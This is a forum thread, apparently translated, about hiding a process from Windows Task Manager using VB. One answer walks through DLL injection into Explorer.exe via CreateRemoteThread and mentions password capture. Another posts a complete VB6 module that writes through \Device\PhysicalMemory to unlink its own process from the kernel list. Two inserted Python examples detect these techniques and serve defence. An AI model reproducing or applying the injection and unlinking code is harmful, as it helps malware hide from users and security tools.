Implementing process hiding with VB
Posted by a user
Posted: 2022-05-07 04:31
5 answers in total
Helpful user
Time: 2023-10-15 16:38
Huh, why does the code in the second reply look so familiar? I think I posted it last year...
The technique commonly used for hiding a process nowadays is process injection: pick a process, such as Explorer.exe, and hide yourself inside it.
Code like this will still be caught by antivirus software, though. I'll just use ready-made code here:
Step 1: raise this process's system privileges.
Because we are going to operate on other processes in the system, without sufficient system privileges we cannot read, let alone write, the memory of other processes. Raising the process's privileges may involve the following functions:
1. Function OpenProcessToken(
HANDLE ProcessHandle, // handle of the process
DWORD DesiredAccess, // access requested on the process
PHANDLE TokenHandle // pointer receiving the handle of the opened process token
);
This function opens the process token.
2. Function LookupPrivilegeValue(
LPCTSTR lpSystemName, // system name
LPCTSTR lpName, // privilege name
PLUID lpLuid // ID unique within the local system
);
This function returns an ID that is unique within the local system, which is used to change system privileges. Its first parameter is the system name; nil means the local system. The second parameter is the name of the privilege. The third parameter receives the ID returned by the function.
3. Function AdjustTokenPrivileges(
HANDLE TokenHandle, // handle of the token whose privileges are changed
BOOL DisableAllPrivileges, // flag: change all privileges or not
PTOKEN_PRIVILEGES NewState, // new system privilege information
DWORD BufferLength, // length of the previous parameter
PTOKEN_PRIVILEGES PreviousState, // returns the privileges as they were before the change
PDWORD ReturnLength // length of the previous parameter
);
This function changes the process's system privileges. The first parameter is the handle of the token whose privileges are to be changed. If the second parameter is true, all system privileges are changed; false changes only some of them. The third parameter is the value of the system privilege to change. The fourth parameter is the size of the third. The fifth parameter returns the privileges as they were before the change; we don't need it, so we set it to nil. The sixth parameter is the size of the fifth.
Putting all of the above together into one function, we can call PromoteDebugPrivilege directly from other code to raise this process's system privileges. The code is as follows:
======================================================================
// Requires the Windows unit (uses Windows;) for the token API declarations.
function PromoteDebugPrivilege(const PromoteEnabled: Boolean): Boolean;
var
  hToken: THandle;
  TokenPriv: TOKEN_PRIVILEGES;
  Length: DWORD;
begin
  Result := False;
  // Open this process's own token with the right to adjust its privileges
  if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken)) then
  begin
    TokenPriv.PrivilegeCount := 1;
    // Look up the LUID of SeDebugPrivilege on the local system (nil = this system)
    LookupPrivilegeValue(nil, 'SeDebugPrivilege', TokenPriv.Privileges[0].Luid);
    if PromoteEnabled then
      TokenPriv.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED
    else
      TokenPriv.Privileges[0].Attributes := 0;
    Length := 0;
    // AdjustTokenPrivileges can succeed even when the privilege was not assigned
    // to the token, so the result is taken from GetLastError afterwards
    AdjustTokenPrivileges(hToken, False, TokenPriv, SizeOf(TokenPriv), nil, Length);
    Result := GetLastError = ERROR_SUCCESS;
    CloseHandle(hToken);
  end;
end;
Step 2: enter the host's memory space
Once we have the permission to enter the host program's memory, what we need to do is add some new program code to its memory space, or have it load a function from a DLL file and run it. Adding new code saves us a DLL file, while loading a DLL lets us install some system-level hooks; if our * program is one that captures passwords, loading a DLL is a good choice.
The function LoadLibraryW in Kernel32.dll can load a DLL; it only needs the DLL's file path to do its work, and obtaining a file path in our program code is easy. But we want the load to happen in the host program, and the DLL path we obtained does not exist in the host program's memory space, so we need to write the DLL's file path into the host's memory. These operations may involve the following functions:
1. Function OpenProcess(
DWORD dwDesiredAccess, // access flags
BOOL bInheritHandle, // handle inheritance flag
DWORD dwProcessId // process ID
);
This function is used to modify some attributes of our host process; these attributes are passed in the first parameter. For example, PROCESS_VM_OPERATION allows remote VM operations, i.e. it allows VirtualProtectEx and WriteProcessMemory to operate on this process's memory space. PROCESS_CREATE_THREAD allows remote thread creation. PROCESS_VM_WRITE allows remote VM writes, i.e. it allows WriteProcessMemory to access this process's memory space. The second parameter is a flag that determines whether the returned handle can be inherited by new processes; in our program it is set to False. The third parameter is the ID of the process to operate on, i.e. the ID of our host process.
2. Function VirtualAllocEx(
HANDLE hProcess, // handle of the process to operate on, our host of course
LPVOID lpAddress, // start address of the region to allocate
DWORD dwSize, // size of the region to allocate
DWORD flAllocationType, // type of allocation
DWORD flProtect // access protection type
);
We use VirtualAllocEx to allocate a block of memory in the host process to hold the DLL's file name. Its first parameter is the process to operate on, the second is the start address, the third is the length, and the fourth and fifth are operation parameters: MEM_COMMIT means the function allocates physical memory or page-file-backed memory, and PAGE_READWRITE means the allocated region allows reading and writing.
3. Function WriteProcessMemory(
HANDLE hProcess, // handle of the process to operate on
LPVOID lpBaseAddress, // start address where the write begins
LPVOID lpBuffer, // pointer to the buffer holding the data to write
DWORD nSize, // number of bytes to write
LPDWORD lpNumberOfBytesWritten // number of bytes actually written
);
Having created the space in the host's memory, we now write the DLL name into it, and WriteProcessMemory is up to the job. Its first parameter is the handle of the process into whose memory the DLL path is to be written; the second parameter is the start address of the target memory for the write; the third parameter is the address of the data to be written; the fourth parameter is the length we intend to write; the fifth parameter is the length actually written, which is an output of the function. At this point we have successfully written the DLL's path name into the host's memory space.
Step 3: start a new thread in the host!
We have just created a buffer in the host program to hold a DLL file path; now we want this DLL to run in the host's memory space. We load it with LoadLibraryW, and to use LoadLibraryW we need to know the entry address of LoadLibraryW. So before loading the DLL we use GetProcAddress to get the entry address of LoadLibraryW. Let's look at how these functions are used:
1. GetProcAddress(
HMODULE hModule, // handle of the DLL module
LPCSTR lpProcName // function name
);
We use this function mainly to get the entry address of LoadLibraryW in kernel32.dll, so
GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW') is enough. Of course some details have to conform to the compiler's requirements; under VC it becomes
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW").
2. CreateRemoteThread(
HANDLE hProcess, // handle of the process to operate on, i.e. our host's handle
LPSECURITY_ATTRIBUTES lpThreadAttributes, // pointer to the thread security attributes
DWORD dwStackSize, // initial stack size
LPTHREAD_START_ROUTINE lpStartAddress, // pointer (address) of the new thread's function
LPVOID lpParameter, // parameter of the new thread's function
DWORD dwCreationFlags, // flags
LPDWORD lpThreadId // thread return value
);
This function is the finishing touch of this article: everything we did before was preparation for it. Its job is to create a new thread in any other process, so that another program or process executes our code alongside its own.
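The three steps above (open the target with write and thread-creation rights, write a path into it, start a remote thread at LoadLibraryW) leave a recognisable trace in endpoint telemetry. The following is an added example, not code from this thread: it runs simple detection logic over constructed, Sysmon-style records (Event ID 10, process accessed, and Event ID 8, CreateRemoteThread detected) and flags a remote thread when its start routine is a LoadLibrary variant or when the same source process had earlier opened the target with the three access bits named in the answer. The one-line key=value record format and all sample values are assumptions made for this example.

```python
"""Detection of the remote-thread DLL-loading pattern described above.

Added example, not code from the answer. It parses constructed, Sysmon-style
records for Event ID 10 (process accessed) and Event ID 8 (CreateRemoteThread
detected) and flags the sequence the answer lays out: a process opens another
with the rights needed to write its memory and create a thread, then starts a
remote thread whose start routine is LoadLibraryW. The one-line key=value
record format and the sample lines are assumptions made for this example.
"""
import re

# Access-mask bits named in the answer (values as defined in the Win32 SDK).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Constructed sample telemetry: one injection-like sequence against explorer.exe
# (PID 1776) and one unrelated remote thread that must not be flagged.
SAMPLE_EVENTS = """\
EventID=10 UtcTime=2023-10-15T08:38:01 SourceProcessId=4120 SourceImage=C:\\Users\\u\\tool.exe TargetProcessId=1776 TargetImage=C:\\Windows\\explorer.exe GrantedAccess=0x1F0FFF
EventID=8 UtcTime=2023-10-15T08:38:02 SourceProcessId=4120 SourceImage=C:\\Users\\u\\tool.exe TargetProcessId=1776 TargetImage=C:\\Windows\\explorer.exe NewThreadId=5008 StartModule=C:\\Windows\\System32\\KERNEL32.DLL StartFunction=LoadLibraryW
EventID=10 UtcTime=2023-10-15T08:40:00 SourceProcessId=620 SourceImage=C:\\Windows\\System32\\csrss.exe TargetProcessId=1776 TargetImage=C:\\Windows\\explorer.exe GrantedAccess=0x1000
EventID=8 UtcTime=2023-10-15T08:41:00 SourceProcessId=620 SourceImage=C:\\Windows\\System32\\csrss.exe TargetProcessId=1776 TargetImage=C:\\Windows\\explorer.exe NewThreadId=5100 StartModule=C:\\Windows\\System32\\ntdll.dll StartFunction=RtlUserThreadStart
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_events(text):
    """Turn key=value lines into dicts, ordered by timestamp."""
    events = []
    for line in text.splitlines():
        if line.strip():
            events.append(dict(FIELD_RE.findall(line)))
    return sorted(events, key=lambda e: e["UtcTime"])


def find_remote_dll_loads(text):
    """Return one finding per suspicious CreateRemoteThread event, with reasons."""
    # (source pid, target pid) pairs whose open carried all three injection rights
    opened_with_inject_rights = set()
    findings = []
    for ev in parse_events(text):
        key = (ev["SourceProcessId"], ev["TargetProcessId"])
        if ev["EventID"] == "10":
            mask = int(ev["GrantedAccess"], 16)
            if (mask & INJECT_MASK) == INJECT_MASK:
                opened_with_inject_rights.add(key)
        elif ev["EventID"] == "8":
            reasons = []
            if ev.get("StartFunction", "").startswith("LoadLibrary"):
                reasons.append("remote thread starts at " + ev["StartFunction"])
            if key in opened_with_inject_rights:
                reasons.append("target was opened with VM_WRITE|VM_OPERATION|CREATE_THREAD")
            if reasons:
                findings.append({
                    "time": ev["UtcTime"],
                    "source_pid": int(ev["SourceProcessId"]),
                    "source": ev["SourceImage"],
                    "target_pid": int(ev["TargetProcessId"]),
                    "target": ev["TargetImage"],
                    "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for f in find_remote_dll_loads(SAMPLE_EVENTS):
        print(f"{f['time']} {f['source']} ({f['source_pid']}) -> "
              f"{f['target']} ({f['target_pid']}): {'; '.join(f['reasons'])}")
```

Either reason on its own is a weak signal (debuggers and some security products open processes with broad rights), so the two are kept separate in the finding; a remote thread at LoadLibraryW from a source that also held write and thread-creation rights on the target is the combination worth alerting on.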
Helpful user
Time: 2023-10-15 16:38
Found an answer from an expert, heh.
VB code for hiding a process on XP/2K systems
Attribute VB_Name = "modHideProcess"
'-------------------------------------------------------------------------------------
' Module name: modHideProcess.bas
'
' Module function: hide the current process from the process list of the XP/2K Task Manager
'
' Usage: call HideCurrentProcess() directly
'
' Module author: retrieved from the Internet, original author unknown.
'
' Modified: 2006/08/26
'---------------------------------------------------------------------------------------
Option Explicit
Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Private Const STATUS_ACCESS_DENIED = &HC0000022
Private Const STATUS_INVALID_HANDLE = &HC0000008
Private Const ERROR_SUCCESS = 0&
Private Const SECTION_MAP_WRITE = &H2
Private Const SECTION_MAP_READ = &H4
Private Const READ_CONTROL = &H20000
Private Const WRITE_DAC = &H40000
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = &H4
Private Type IO_STATUS_BLOCK
Status As Long
Information As Long
End Type
Private Type UNICODE_STRING
Length As Integer
MaximumLength As Integer
Buffer As Long
End Type
Private Const OBJ_INHERIT = &H2
Private Const OBJ_PERMANENT = &H10
Private Const OBJ_EXCLUSIVE = &H20
Private Const OBJ_CASE_INSENSITIVE = &H40
Private Const OBJ_OPENIF = &H80
Private Const OBJ_OPENLINK = &H100
Private Const OBJ_KERNEL_HANDLE = &H200
Private Const OBJ_VALID_ATTRIBUTES = &H3F2
Private Type OBJECT_ATTRIBUTES
Length As Long
RootDirectory As Long
ObjectName As Long
Attributes As Long
SecurityDescriptor As Long
SecurityQualityOfService As Long
End Type
Private Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type
Private Enum ACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
End Enum
Private Enum MULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
End Enum
Private Enum TRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
End Enum
Private Enum TRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
End Enum
Private Type TRUSTEE
pMultipleTrustee As Long
MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
TrusteeForm As TRUSTEE_FORM
TrusteeType As TRUSTEE_TYPE
ptstrName As String
End Type
Private Type EXPLICIT_ACCESS
grfAccessPermissions As Long
grfAccessMode As ACCESS_MODE
grfInheritance As Long
TRUSTEE As TRUSTEE
End Type
Private Type AceArray
List() As EXPLICIT_ACCESS
End Type
Private Enum SE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE = 0
SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARE
SE_KERNEL_OBJECT
SE_WINDOW_OBJECT
SE_DS_OBJECT
SE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECT
SE_WMIGUID_OBJECT
End Enum
Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, _
    ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, _
    ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, _
    ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, _
    ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDescriptor As Long) As Long
Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" _
    (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, _
    ByVal OldAcl As Long, NewAcl As Long) As Long
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" _
    (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, ByVal AccessPermissions As Long, _
    ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)
Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, _
    ByVal SourceString As Long)
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, _
    ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, _
    ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, _
    ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, _
    Source As Any, ByVal Length As Long)
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" _
    (LpVersionInformation As OSVERSIONINFO) As Long
Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
Private verinfo As OSVERSIONINFO
Private g_hNtDLL As Long
Private g_pMapPhysicalMemory As Long
Private g_hMPM As Long
Private aByte(3) As Byte
Public Sub HideCurrentProcess()
    ' Hide the current application's process from the process list
    Dim thread As Long, process As Long, fw As Long, bw As Long
    Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long
    ' Field offsets inside the kernel process structure differ between Windows 2000 (5.0) and XP (5.1)
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
        If verinfo.dwPlatformId = 2 Then
            If verinfo.dwMajorVersion = 5 Then
                Select Case verinfo.dwMinorVersion
                    Case 0
                        lOffsetFlink = &HA0
                        lOffsetBlink = &HA4
                        lOffsetPID = &H9C
                    Case 1
                        lOffsetFlink = &H88
                        lOffsetBlink = &H8C
                        lOffsetPID = &H84
                End Select
            End If
        End If
    End If
    If OpenPhysicalMemory <> 0 Then
        thread = GetData(&HFFDFF124)          ' current thread structure
        process = GetData(thread + &H44)       ' its owning process structure
        fw = GetData(process + lOffsetFlink)   ' next entry in the process list
        bw = GetData(process + lOffsetBlink)   ' previous entry in the process list
        SetData fw + 4, bw                     ' point the neighbours at each other
        SetData bw, fw
        CloseHandle g_hMPM
    End If
End Sub
Private Sub SetPhysicalMemorySectionWritable(ByVal hSection As Long)
    ' Add a write-access entry for the current user to the section's DACL
    Dim pDacl As Long
    Dim pNewDacl As Long
    Dim pSD As Long
    Dim dwRes As Long
    Dim ea As EXPLICIT_ACCESS
    GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD
    ea.grfAccessPermissions = SECTION_MAP_WRITE
    ea.grfAccessMode = GRANT_ACCESS
    ea.grfInheritance = NO_INHERITANCE
    ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
    ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
    ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar
    SetEntriesInAcl 1, ea, pDacl, pNewDacl
    SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0
CleanUp:
    LocalFree pSD
    LocalFree pNewDacl
End Sub
Private Function OpenPhysicalMemory() As Long
    Dim Status As Long
    Dim PhysmemString As UNICODE_STRING
    Dim Attributes As OBJECT_ATTRIBUTES
    RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")
    Attributes.Length = Len(Attributes)
    Attributes.RootDirectory = 0
    Attributes.ObjectName = VarPtr(PhysmemString)
    Attributes.Attributes = 0
    Attributes.SecurityDescriptor = 0
    Attributes.SecurityQualityOfService = 0
    Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
    If Status = STATUS_ACCESS_DENIED Then
        ' No write access: reopen with the right to change the DACL, widen it, then try again
        Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)
        SetPhysicalMemorySectionWritable g_hMPM
        CloseHandle g_hMPM
        Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
    End If
    Dim lDirectory As Long   ' physical address of the page directory for this Windows version
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
        If verinfo.dwPlatformId = 2 Then
            If verinfo.dwMajorVersion = 5 Then
                Select Case verinfo.dwMinorVersion
                    Case 0
                        lDirectory = &H30000
                    Case 1
                        lDirectory = &H39000
                End Select
            End If
        End If
    End If
    If Status = 0 Then
        g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectory, &H1000)
        If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM
    End If
End Function
Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
    ' Translate a virtual address to a physical one by walking the page directory and page table
    Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
    Dim lTemp As Long
    VAddr = addr
    CopyMemory aByte(0), VAddr, 4
    lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))    ' page directory index (top 10 bits, unsigned)
    PGDE = BaseAddress + lTemp * 4
    CopyMemory PGDE, ByVal PGDE, 4
    If (PGDE And 1) <> 0 Then                         ' directory entry present
        lTemp = PGDE And &H80
        If lTemp <> 0 Then                            ' 4 MB large page: no page table level
            PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
        Else
            PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)
            lTemp = (VAddr And &H3FF000) / (2 ^ 12)   ' page table index
            PTE = PGDE + lTemp * 4
            CopyMemory PTE, ByVal PTE, 4
            If (PTE And 1) <> 0 Then                  ' page table entry present
                PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
                UnmapViewOfFile PGDE
            End If
        End If
    End If
    LinearToPhys = PAddr
End Function
Private Function GetData(addr As Long) As Long
    ' Read one 32-bit value at a virtual address through the physical-memory section
    Dim phys As Long, tmp As Long, ret As Long
    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)
    If tmp <> 0 Then
        ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
        CopyMemory ret, ByVal ret, 4
        UnmapViewOfFile tmp
        GetData = ret
    End If
End Function
Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
    ' Write one 32-bit value at a virtual address through the physical-memory section
    Dim phys As Long, tmp As Long, x As Long
    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)
    If tmp <> 0 Then
        x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4
        CopyMemory ByVal x, data, 4
        UnmapViewOfFile tmp
        SetData = True
    End If
End Function
Private Function ByteArrToLong(inByte() As Byte) As Double
    ' Assemble four little-endian bytes into an unsigned value (Double avoids sign overflow)
    Dim I As Integer
    For I = 0 To 3
        ByteArrToLong = ByteArrToLong + inByte(I) * (&H100 ^ I)
    Next I
End Function
Tested on XP SP2 + VB 6.0.
To modify or kill another process from within a system process, you need the following steps:
1. Raise the process's own privileges so that it has a high privilege level
2. Search for the host process
3. Save the PCB
4. Modify the process
5. If something goes wrong, restore the PCB
Is that explanation clear to you?
I think you should look into what each API in the module does, one by one; if you don't understand what they do, explaining it won't help. You can look up the relevant material on MSDN.microsoft.
API information for the Types can be found in FoxApi.
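The module above takes the process out of the kernel's active-process list by re-pointing its two neighbours (the two SetData calls), which is why Task Manager, which walks that list, no longer shows it. The process object itself is untouched, and that is what a defender checks for. The following is an added example, not part of the thread's code: it models the list in plain Python and runs a cross-view comparison, the walk along the links against the full table of process objects (the view a PID lookup or a memory scan for process structures gives). A record in the table that the walk never reaches, and whose own links still point at list members that no longer point back, is the signature of an unlinked process. The sample process table is constructed for this example.

```python
"""Cross-view check for process records unlinked from the active-process list.

Added example, not part of the module above. It models in plain Python the
structure that module patches: every process record carries a forward link
and a backward link (the Flink/Blink pair at the offsets the module selects
per Windows version) and the records form a circular doubly linked list. A
walk along the links is one view of the running processes; the full table
of process objects (what a lookup by process ID, or a memory scan for
process structures, produces) is a second view. A record present in the
second view but absent from the first has been unlinked. The sample process
table is constructed for this example.
"""


class ProcessRecord:
    """Minimal stand-in for a kernel process structure."""

    def __init__(self, pid, name):
        self.pid = pid
        self.name = name
        self.flink = None  # next record in the active-process list
        self.blink = None  # previous record in the active-process list


def build_process_list(entries):
    """Build the circular list with a sentinel head; return (head, pid table)."""
    head = ProcessRecord(-1, "<list head>")
    head.flink = head.blink = head
    table = {}
    for pid, name in entries:
        rec = ProcessRecord(pid, name)
        tail = head.blink          # append before the head, i.e. at the tail
        tail.flink = rec
        rec.blink = tail
        rec.flink = head
        head.blink = rec
        table[pid] = rec
    return head, table


def detach(rec):
    """Re-point the neighbours around rec without touching rec's own links;
    in the model this is what the module's two SetData calls do."""
    rec.blink.flink = rec.flink
    rec.flink.blink = rec.blink


def walk_list(head, limit=100000):
    """View 1: follow Flink from the head until it comes back around."""
    pids = []
    node = head.flink
    while node is not head:
        if len(pids) >= limit:
            raise RuntimeError("list does not close; possible corruption")
        pids.append(node.pid)
        node = node.flink
    return pids


def cross_view(head, table):
    """Compare the list walk against the full object table.

    Returns (hidden, orphaned): hidden = PIDs in the table that the walk never
    reaches; orphaned = hidden records whose own links still point at list
    members that no longer point back, which distinguishes an unlinked record
    from one that was simply never on the list."""
    reachable = set(walk_list(head))
    hidden = sorted(pid for pid in table if pid not in reachable)
    orphaned = [pid for pid in hidden
                if table[pid].flink is not None
                and table[pid].flink.blink is not table[pid]]
    return hidden, orphaned


# Constructed sample process table (PIDs and names are made up).
SAMPLE_PROCESSES = [(4, "System"), (368, "smss.exe"), (1776, "explorer.exe"), (2044, "agent.exe")]


def demo(hidden_pid=2044):
    """Build the sample, unlink one record, and run the cross-view check."""
    head, table = build_process_list(SAMPLE_PROCESSES)
    before = walk_list(head)
    detach(table[hidden_pid])
    after = walk_list(head)
    hidden, orphaned = cross_view(head, table)
    return {"before": before, "after": after, "hidden": hidden, "orphaned": orphaned}


if __name__ == "__main__":
    r = demo()
    print("walk before:", r["before"])
    print("walk after: ", r["after"])
    print("hidden:", r["hidden"], "orphaned:", r["orphaned"])
```

The same comparison is what memory-forensics tooling does on a captured image: Volatility's pslist walks the list while psscan finds process structures by scanning memory, and a PID that appears only in the scan is exactly the case demo() reproduces. On a live system the second view can come from any enumeration that does not depend on the list (for example the kernel's handle/PID table or walking threads rather than processes), and a mismatch between views is the indicator, independent of which offsets a particular Windows build uses.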
Helpful user
Time: 2023-10-15 16:39
I don't think a process can be hidden.
If it could, why aren't Microsoft's system processes hidden?
Hiding the user program from the Task Manager is possible, though:
Private Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
' GW_OWNER = 4 (the form's owner window), SW_HIDE = 0
Call ShowWindow(GetWindow(Me.hwnd, 4), 0)
Me.hwnd is the form's handle.
Even if you can hide the process, it can still be found by scanning everything through the API,
including the third-party files you reference, which can be scanned too.
But that's too long
and not convenient to post here.
Helpful user
Time: 2023-10-15 16:40
Private Sub Form_Load()
    App.TaskVisible = False
End Sub
This doesn't hide the process, but it does hide the entry shown under Applications.
Helpful user
Time: 2023-10-15 16:40
Good luck, OK!